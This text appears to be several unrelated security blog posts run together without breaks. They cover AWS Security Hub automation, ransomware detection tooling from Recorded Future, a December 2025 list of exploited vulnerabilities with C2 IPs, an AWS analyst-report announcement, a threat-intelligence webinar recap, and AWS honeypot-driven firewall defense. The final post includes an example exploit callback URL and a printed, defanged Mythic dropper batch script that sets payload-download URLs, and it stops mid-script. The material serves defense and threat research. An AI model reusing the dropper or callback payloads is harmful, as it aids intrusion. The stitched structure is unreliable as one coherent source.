Security Hub automation supports many use cases. Talk with your teams to understand which fit your needs and security objectives. The following are some examples of how you can use security hub automation:
Automated finding remediation
Use automated finding remediation to automatically fix security issues as they’re detected.
Supporting patterns:
Direct remediation: Trigger AWS Lambda functions to fix misconfigurations
Resource tagging: Add tags to non-compliant resources for tracking
Configuration correction: Update resource configurations to match security policies
Step 2: Create automation rules to update finding details and third-party integration
After Security Hub collects findings you can create automation rules to update and route the findings to the appropriate teams. The steps to create automation rules that update finding details or to a set up a third-party integration—such as Jira or ServiceNow—based on criteria you define can be found in Creating automation rules in Security Hub.
With automation rules, Security Hub evaluates findings against the defined rule and then makes the appropriate finding update or calls the APIs to send findings to Jira or ServiceNow. Security Hub sends a copy of every finding to Amazon EventBridge so that you can also implement your own automated response (if needed) for use cases outside of using Security Hub automation rules.
In addition to sending a copy of every finding to EventBridge, Security Hub classifies and enriches security findings according to business context, then delivers them to the appropriate downstream services (such as ITSM tools) for fast response.
Best practices
AWS Security Hub automation rules offer capabilities for automatically updating findings and integrating with other tools. When implementing automation rules, follow these best practices:
Centralized management: Only the Security Hub administrator account can create, edit, delete, and view automation rules. Ensure proper access control and management of this account.
Regional deployment: Automation rules can be created in one AWS Region and then applied across configured Regions. When using Region aggregation, you can only create rules in the home Region. If you create an automation rule in an aggregation Region, it will be applied in all included Regions. If you create an automation rule in a non-linked Region, it will be applied only in that Region. For more information, see Creating automation rules in Security Hub.
Define specific criteria: Clearly define the criteria that findings must match for the automation rule to apply. This can include finding attributes, severity levels, resource types, or member account IDs.
Understand rule order: Rule order matters when multiple rules apply to the same finding or finding field. Security Hub applies rules with a lower numerical value first. If multiple findings have the same RuleOrder, Security Hub applies a rule with an earlier value for the UpdatedAt field first (that is, the rule which was most recently edited applies last). For more information, see Updating the rule order in Security Hub.
Provide clear descriptions: Include a detailed rule description to provide context for responders and resource owners, explaining the rule’s purpose and expected actions.
Use automation for efficiency: Use automation rules to automatically update finding fields (such as severity and workflow status), suppress low-priority findings, or create tickets in third-party tools such as Jira or ServiceNow for findings matching specific attributes.
Consider EventBridge for external actions: While automation rules handle internal Security Hub finding updates, use EventBridge rules to trigger actions outside of Security Hub, such as invoking Lambda functions or sending notifications to Amazon Simple Notification Service (Amazon SNS) topics based on specific findings. Automation rules take effect before EventBridge rules are applied. For more information, see Automation rules in EventBridge.
Manage rule limits: This is a maximum limit of 100 automation rules per administrator account. Plan your rule creation strategically to stay within this limit.
Regularly review and refine: Periodically review automation rules, especially suppression rules, to ensure they remain relevant and effective, adjusting them as your security posture evolves.
Conclusion
You can use Security Hub automation to triage, route, and respond to findings faster through a unified cloud security solution with centralized management. In this post, you learned how to create automation rules that route findings to ticketing systems integrations and upgrade critical findings for immediate response. Through the intuitive and flexible approach to automation that Security Hub provides, your security teams can make confident, data-driven decisions about Security Hub findings that align with your organization’s overall security strategy.
With Security Hub automation features, you can centrally manage security across hundreds of accounts while your teams focus on critical issues that matter most to your business. By implementing the automation capabilities described in this post, you can streamline response times at scale, reduce manual effort, and improve your overall security posture through consistent, automated workflows.
Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.
The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.
Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.
Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.
Introduction
The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.
The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the 2025 Verizon Data Breach Investigations Report. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.
This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).
The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.
The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.
The Ransomware Detection Tool Landscape: Three Pillars of Defense
Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.
1. Endpoint and Extended Detection and Response (EDR/XDR) Tools
EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.
Core Functionality
EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.
How Threat Intelligence Enhances EDR/XDR
Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.
Example Tools
CrowdStrike Falcon delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.
Microsoft Defender XDR integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.
SentinelOne employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.
2. Network Detection and Response (NDR) Tools
While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.
Core Functionality
NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.
How Threat Intelligence Improves NDR and Deception
Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.
Example Tools
Vectra AI specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.
ExtraHop Reveal(x) provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.
Illusive (now part of Zscaler) deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.
3. Threat Intelligence Tools
The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.
Core Functionality
Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.
How Threat Intelligence Strengthens Ransomware Detection
These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:
Threat Mapping: Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.
Infrastructure Tracking: Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.
Variant Identification: Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.
Exploitation Intelligence: Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.
Recorded Future delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.
Flashpoint specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.
Google Threat Intelligence (formerly Mandiant) combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.
Choosing the Right Ransomware Detection Tools
Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.
Security leaders should prioritize:
Pre-encryption visibility: Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.
Context-rich alerts: Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.
Integration maturity: Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.
Operational efficiency: Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.
Relevance: Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.
Scalability: Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.
How Recorded Future Enables Early Ransomware Detection
The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing alert fatigue draining analyst time on false positives instead of credible threats.
Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.
Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.
Proactive Mitigation Through Vulnerability Intelligence
Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.
The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.
Victimology and Anticipation
Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.
This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.
Shifting From Reactive Response to Intelligence-Led Prevention
No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.
Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.
Frequently Asked Questions
Can behavioral analytics alone stop zero-day ransomware variants?
While powerful, behavioral analytics alone cannot guarantee a stop to a true zero-day ransomware variant. It excels at detecting malicious behavior (like mass file encryption or privilege escalation), even from unknown malware. The most effective defense is a combination of behavioral analytics, up-to-the-minute threat intelligence on emerging TTPs, and controlled execution (sandboxing).
What is the most common weakness of signature-based ransomware detection methods today?
The primary weakness is their reactive nature. Signature-based tools only detect known threats—they require a threat to be analyzed and its signature created before they can flag it. They are easily bypassed by polymorphic ransomware or customized, novel variants that threat actors create to evade detection.
How can Recorded Future's SecOps Intelligence Module help my existing EDR/XDR tool detect ransomware faster?
Recorded Future's SecOps Intelligence Module ingests and correlates massive amounts of external threat data. It directly integrates with your existing EDR/XDR tools, enriching alerts with real-time context (Risk Scores, actor TTPs, associated malware). This helps your existing tools move beyond basic indicators, prioritize critical alerts, and automatically initiate responses before a potential ransomware event escalates.
How does Recorded Future provide victimology data to anticipate ransomware attacks targeting my industry?
Recorded Future's Threat Intelligence Module provides crucial victimology and actor insights. It monitors real-time chatter on the dark web and forums to identify specific ransomware groups, their infrastructure, and the industries or regions they are planning to target next. This allows you to prioritize defenses based on pre-attack relevance.
Is a dedicated deception technology platform considered a primary ransomware detection tool?
Deception technology is not a primary prevention tool, but it is an extremely effective early detection tool. It places fake assets (honeypots, fake credentials) within the network. When an attacker, particularly ransomware moving laterally, interacts with a decoy, it immediately triggers a high-fidelity alert, providing security teams with crucial seconds to isolate the endpoint and stop the attack before encryption begins.
December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.
What security teams need to know:
React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines
Legacy vulnerabilities resurface: CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps
Bottom line: December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.
Quick Reference Table
All 22 vulnerabilities below were actively exploited in December 2025.
Why this matters: Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.
Affected versions:
React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)
Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77
Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin
Immediate actions:
Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately
Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5
Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints
Check logs for E{"digest" error patterns indicating exploitation attempts
Review server processes for unexpected Node.js child processes
Exposure: ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)
Figure 1:Vulnerability IntelligenceCard® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)
CVE-2025-20393 | Cisco Secure Email Gateway
Risk Score: 99 (Very Critical) | Active exploitation by UAT-9686
Why this matters: Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.
Affected products: Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS
Immediate actions:
Apply Cisco's security updates immediately
Monitor Spam Quarantine web interface access logs
Check for modifications to /data/web/euq_webui/htdocs/index.py
Hunt for AquaShell, AquaPurge, and AquaTunnel indicators
Review outbound connections to suspicious IPs
Known C2 infrastructure: 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)
For the third year in a row, Amazon Web Services (AWS) is named as a Leader in the Information Services Group (ISG) Provider LensTM Quadrant report for Sovereign Cloud Infrastructure Services (EU), published on January 9, 2026. ISG is a leading global technology research, analyst, and advisory firm that serves as a trusted business partner to more than 900 clients. This ISG report evaluates 19 providers of sovereign cloud infrastructure services in the multi-public-cloud environment and examines how they address the key challenges that enterprise clients face in the European Union (EU). ISG defines Leaders as providers who represent innovative strength and competitive stability.
ISG rated AWS ahead of other leading cloud providers on both the competitive strength and portfolio attractiveness axes, with the highest score on portfolio attractiveness. Competitive strength was assessed on multiple factors, including degree of awareness, core competencies, and go-to-market strategy. Portfolio attractiveness was assessed on multiple factors, including scope of portfolio, portfolio quality, strategy and vision, and local characteristics.
According to ISG, “AWS’s infrastructure provides robust resilience and availability, supported by a sovereign-by-design architecture that ensures data residency and regional independence.”
Read the report to:
Discover why AWS was named as a Leader with the highest score on portfolio attractiveness by ISG.
Gain further understanding on how the AWS Cloud is sovereign-by-design and how it continues to offer more control and more choice without compromising on the full power of AWS.
Learn how AWS is delivering on its Digital Sovereignty Pledge and is investing in an ambitious roadmap of capabilities for data residency, granular access restriction, encryption, and resilience.
AWS’s recognition as a Leader in this report for the third consecutive year underscores our commitment to helping European customers and partners meet their digital sovereignty and resilience requirements. We are building on the strong foundation of security and resilience that has underpinned AWS services, including our long-standing commitment to customer control over data residency, our design principal of strong regional isolation, our deep European engineering roots, and our more than a decade of experience operating multiple independent clouds for the most critical and restricted workloads.
Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.
Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.
Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.
But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.
Intelligence as a strategic asset
Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”
Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”
Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”
How threat intelligence delivers organization-wide value
Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.
Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”
Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”
Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”
The anatomy of a mature threat intelligence program
According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.
“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.
Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”
Pathways to advancing maturity
Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”
Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”
Top challenges for CTI teams
The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”
Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.
Looking to the future of threat intelligence
When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.
Cyber threats are evolving faster than traditional security defense can respond; workloads with potential security issues are discovered by threat actors within 90 seconds, with exploitation attempts beginning within 3 minutes. Threat actors are quickly evolving their attack methodologies, resulting in new malware variants, exploit techniques, and evasion tactics. They also rotate their infrastructure—IP addresses, domains, and URLs. Effectively defending your workloads requires quickly translating threat data into protective measures and can be challenging when operating at internet scale. This post describes how AWS active threat defense for AWS Network Firewall can help to detect and block these potential threats to protect your cloud workloads.
Active threat defense detects and blocks network threats by drawing on real-time intelligence gathered through MadPot, the network of honeypot sensors used by Amazon to actively monitor attack patterns. Active threat defense rules treat speed as a foundational tenet, not an aspiration. When threat actors create a new domain to host malware or set up fresh command-and-control servers, MadPot sees them in action. Within 30 minutes of receiving new intelligence from MadPot, active threat defense automatically translates that intelligence into threat detection through Amazon GuardDuty and active protection through AWS Network Firewall.
Speed alone isn’t enough without applying the right threat indicators to the right mitigation controls. Active threat defense disrupts attacks at every stage: it blocks reconnaissance scans, prevents malware downloads, and severs command-and-control communications between compromised systems and their operators. This creates a multi-layered defense approach that can disrupt attacks that can bypass some of the layers.
How active threat defense works
MadPot honeypots mimic cloud servers, databases, and web applications—complete with the misconfigurations and security gaps that threat actors actively hunt for. When threat actors take the bait and launch their attacks, MadPot captures the complete attack lifecycle against these honeypots, mapping the threat actor infrastructure, capturing emerging attack techniques, and identifying novel threat patterns. Based on observations in MadPot, we also identify infrastructure with similar fingerprints through wider scans of the internet.
Figure 1: Overview of active threat defense integration
Figure 1 shows how this works. When threat actors deliver malware payloads to MadPot honeypots, AWS executes the malicious code in isolated environments, extracting indicators of compromise from the malware’s behavior—the domains it contacts, the files it drops, the protocols it abuses. This threat intelligence feeds active threat defense’s automated protection: Active threat defense validates indicators, converts them to firewall rules, tests for performance impact, and deploys them globally to Network Firewall—all within 30 minutes. And because threats evolve, active threat defense monitors changes in threat actor infrastructure, automatically updating protection rules as threat actors rotate domains, shift IP addresses, or modify their tactics. Active threat defense adapts automatically as threats evolve.
Figure 2: Swiss cheese model
Active threat defense uses the Swiss cheese model of defense (shown in Figure 2)—a principle recognizing that no single security control is perfect, but multiple imperfect layers create robust protection when stacked together. Each defensive layer has gaps. Threat actors can bypass DNS filtering with direct IP connections, encrypted traffic defeats HTTP inspection, domain fronting or IP-only connections evade TLS SNI analysis. Active threat defense applies threat indicators across multiple inspection points. If threat actors bypass one layer, other layers can still detect and block them. When MadPot identifies a malicious domain, Network Firewall doesn’t only block the domain, it also creates rules that deny DNS queries, block HTTP host headers, prevent TLS connections using SNI, and drop direct connections to the resolved IP addresses. Similar to Swiss cheese slices stacked together, the holes rarely align—and active threat defense reduces the likelihood of threat actors finding a complete path to their target.
Disrupting the attack kill chain with active threat defense
Let’s look at how active threat defense disrupts threat actors across the entire attack lifecycle with this Swiss cheese approach. Figure 3 illustrates an example attack methodology—described in the following sections—that threat actors use to compromise targets and establish persistent control for malicious activities. Modern attacks require network communications at every stage—and that’s precisely where active threat defense creates multiple layers of defense. This attack flow demonstrates the importance of network-layer security controls that can intercept and block malicious communications at each stage, preventing successful compromise even when initial vulnerabilities exist.
Figure 3: An example flow of an attack scenario using an OAST technique
Step 0: Infrastructure preparation
Before launching attacks, threat actors provision their operational infrastructure. For example, this includes setting up an out-of-band application security testing (OAST) callback endpoint—a reconnaissance technique that threat actors use to verify successful exploitation through separate communication channels. They also provision malware distribution servers hosting the payloads that will infect victims, and command-and-control (C2) servers to manage compromised systems. MadPot honeypots detect this infrastructure when threat actors use it against decoy systems, feeding those indicators into active threat detection protection rules.
Step 1: Target identification
Threat actors compile lists of potential victims through automated internet scanning or by purchasing target lists from underground markets. They’re looking for workloads running vulnerable software, exposed services, or common misconfigurations. MadPot honeypot system experiences more than 750 million such interactions with potential threat actors every day. New MadPot sensors are discovered within 90 seconds; this visibility reveals patterns that would otherwise go unnoticed. Active threat detection doesn’t stop reconnaissance but uses MadPot’s visibility to disrupt later stages.
Step 2: Vulnerability confirmation
The threat actor attempts to verify a vulnerability in the target workload, embedding an OAST callback mechanism within the exploit payload. This might take the form of a malicious URL like http://malicious-callback[.]com/verify?target=victim injected into web forms, HTTP headers, API parameters, or other input fields. Some threat actors use OAST domain names that are also used by legitimate security scanners, while others use more custom domains to evade detection. The following table list 20 example vulnerabilities that threat actors tried to exploit against MadPot using OAST links over the past 90 days.
Commvault Command Center path traversal vulnerability
Step 3: OAST callback
When vulnerable workloads process these malicious payloads, they attempt to initiate callback connections to the threat actor’s OAST monitoring servers. These callback signals would normally provide the threat actor with confirmation of successful exploitation, along with intelligence about the compromised workload, vulnerability type, and potential attack progression pathways. Active threat detection breaks the attack chain at this point. MadPot identifies the malicious domain or IP address and adds it to the active threat detection deny list. When the vulnerable target attempts to execute the network call to the threat actor’s OAST endpoint, Network Firewall with active threat detection enabled blocks the outbound connection. The exploit might succeed, but without confirmation, the threat actor can’t identify which targets to pursue—stalling the attack.
Step 4: Malware delivery preparation
After the threat actor identifies a vulnerable target, they exploit the vulnerability to deliver malware that will establish persistent access. The following table lists 20 vulnerabilities that threat actors tried to exploit against MadPot to deliver malware over the past 90 days:
The compromised target attempts to download the malware payload from the threat actor’s distribution server, but active threat defense intervenes again. The malware hosting infrastructure—whether it’s a domain, URL, or IP address—has been identified by MadPot and blocked by Network Firewall. If malware is delivered through TLS endpoints, active threat defense has rules that inspect the Server Name Indication (SNI) during the TLS handshake to identify and block malicious domains without decrypting traffic. For malware not delivered through TLS endpoints or customers who have enabled the Network Firewall TLS inspection feature, active threat defense rules inspect full URLs and HTTP headers, applying content-based rules before re-encrypting and forwarding legitimate traffic. Without successful malware delivery and execution, the threat actor cannot establish control.
Step 6: Command and control connection
If malware had somehow been delivered, it would attempt to phone home by connecting to the threat actor’s C2 server to receive instructions. At this point, another active threat defense layer activates. In Network Firewall, active threat defense implements mechanisms across multiple protocol layers to identify and block C2 communications before they facilitate sustained malicious operations. At the DNS layer, Network Firewall blocks resolution requests for known-malicious C2 domains, preventing malware from discovering where to connect. At the TCP layer, Network Firewall blocks direct connections to C2 IP addresses and ports. At the TLS layer—as described in Step 5—Network Firewall uses SNI inspection and fingerprinting techniques—or full decryption when enabled—to identify encrypted C2 traffic. Network Firewall blocks the outbound connection to the known-malicious C2 infrastructure, severing the threat actor’s ability to control the infected workload. Even if malware is present on the compromised workload, it’s effectively neutralized by being isolated and unable to communicate with its operator. Similarly, threat detection findings are created in Amazon GuardDuty for attempts to connect to the C2, so you can initiate incident response workflows. The following table lists examples of C2 frameworks that MadPot and our internet-wide scans have observed over the past 90 days:
Command and control frameworks
Adaptix
Metasploit
AsyncRAT
Mirai
Brute Ratel
Mythic
Cobalt Strike
Platypus
Covenant
Quasar
Deimos
Sliver
Empire
SparkRAT
Havoc
XorDDoS
Step 7: Attack objectives blocked
Without C2 connectivity, the threat actor cannot steal data or exfiltrate credentials. The layered approach used by active threat defense means threat actors must succeed at every step, while you only need to block one stage to stop the activity. This defense-in-depth approach reduces risk even if some defense layers have vulnerabilities. You can track active threat defense actions in the Network Firewall alert log.
Real attack scenario – Stopping a CVE-2025-48703 exploitation campaign
In October 2025, AWS MadPot honeypots began detecting an attack campaign targeting Control Web Panel (CWP)—a server management platform used by hosting providers and system administrators. The threat actor was attempting to exploit CVE-2025-48703, a remote code execution vulnerability in CWP, to deploy the Mythic C2 framework. While Mythic is an open source command and control platform originally designed for legitimate red team operations, threat actors also adopt it for malicious campaigns. The exploit attempts originated from IP address 61.244.94[.]126, which exhibited characteristics consistent with a VPN exit node.
To confirm vulnerable targets, the threat actor attempted to execute operating system commands by exploiting the CWP file manager vulnerability. MadPot honeypots received exploitation attempts like the following example using the whoami command:
While this specific campaign didn’t use OAST callbacks for vulnerability confirmation, MadPot observes similar CVE-2025-48703 exploitation attempts using OAST callbacks like the following example:
After the vulnerable systems were identified, the attack moved immediately to payload delivery. MadPot captured infection attempts targeting both Linux and Windows workloads. For Linux targets, the threat actor used curl and wget to download the malware:
When MadPot honeypots observe these exploitation attempts, they download the malicious payloads the same as vulnerable servers would. MadPot uses these observations to extract threat indicators at multiple layers of analysis.
Layer 1 — MadPot identified the staging URLs and underlying IP addresses hosting the malware:
Layer 2 – MadPot’s analysis of the malware revealed that the Windows batch file (SHA256: 6ec153a1...) contained logic to detect system architecture and download the appropriate Mythic agent:
@echo off
setlocal enabledelayedexpansion
set u64="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w64&stage=true"
set u32="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w32&stage=true"
set v="C:\Users\Public\350b0949tcp.exe"
